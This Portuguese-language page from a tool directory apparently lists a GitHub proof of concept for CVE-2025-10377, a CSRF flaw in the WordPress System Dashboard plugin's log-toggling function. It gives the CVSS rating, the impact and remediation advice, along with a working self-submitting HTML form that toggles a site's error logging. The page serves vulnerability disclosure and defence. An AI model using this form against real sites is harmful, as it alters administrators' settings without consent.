Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
Ferramentas/GitHubGitHub/nagisayumaa/cve-2025-10377
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

Ver Repositório
há 0 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito CVE-2025-10377 Cross-Site Request Forgery (CSRF) no Plugin System Dashboard (Função sd_toggle_logs)

Tipo de Vulnerabilidade: Cross-Site Request Forgery (CSRF)

Função Afetada: sd_toggle_logs()

CVSS v3.1: 4.3 (Médio)
Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(Nota: A pontuação reflete uma alteração não autorizada de estado que requer uma vítima administradora e interação do usuário.)

Descrição da Vulnerabilidade:

A função sd_toggle_logs() processa operações sensíveis, como ativar/desativar Logs de Acesso à Página, Logs de Erro e Logs de Entrega de Email. No entanto, ela depende apenas do parâmetro $_REQUEST['log_type'] e de uma verificação de capacidade (current_user_can( 'manage_options' )) sem implementar proteção CSRF (por exemplo, check_admin_referer() ou um nonce).

Como resultado, um atacante pode induzir um Administrador logado a visitar uma página maliciosa que envia silenciosamente uma requisição manipulada, causando alterações não intencionais de ativação/desativação no registro do site.

Impacto:

  • Alterações não autorizadas de estado para os recursos de registro do site (Log de Acesso à Página, Log de Erro, Log de Entrega de Email).

  • Se o registro de erros estiver ativado, o site pode começar a escrever erros de aplicação em um caminho de arquivo determinado pelo plugin (aumentando a chance de divulgação de informações operacionais através de logs), mas o impacto direto desta questão é a própria alternância de estado.

Baixar ferramenta

POC

Quando um Usuário logado com manage_options visita a página do atacante, o respectivo recurso de registro é alternado sem consentimento explícito.

root@kitploit:~
 <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
      <input type="hidden" name="log&#95;type" value="errors&#95;log" />
      <input type="hidden" name="fast&#95;ajax" value="true" />
      <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Remediação

  • Implementar nonces do WordPress (check_admin_referer() ou wp_verify_nonce()) para validar requisições.

  • Restringir ações sensíveis apenas a requisições POST.

  • Evite depender apenas de verificações de capacidade para proteção contra CSRF.

Vídeo POC

Se você não conseguir reproduzir o problema exatamente como descrito no relatório, consulte a seguinte demonstração em vídeo (PoC) para um cenário claro de reprodução:

https://youtu.be/WtWYIfEM4W0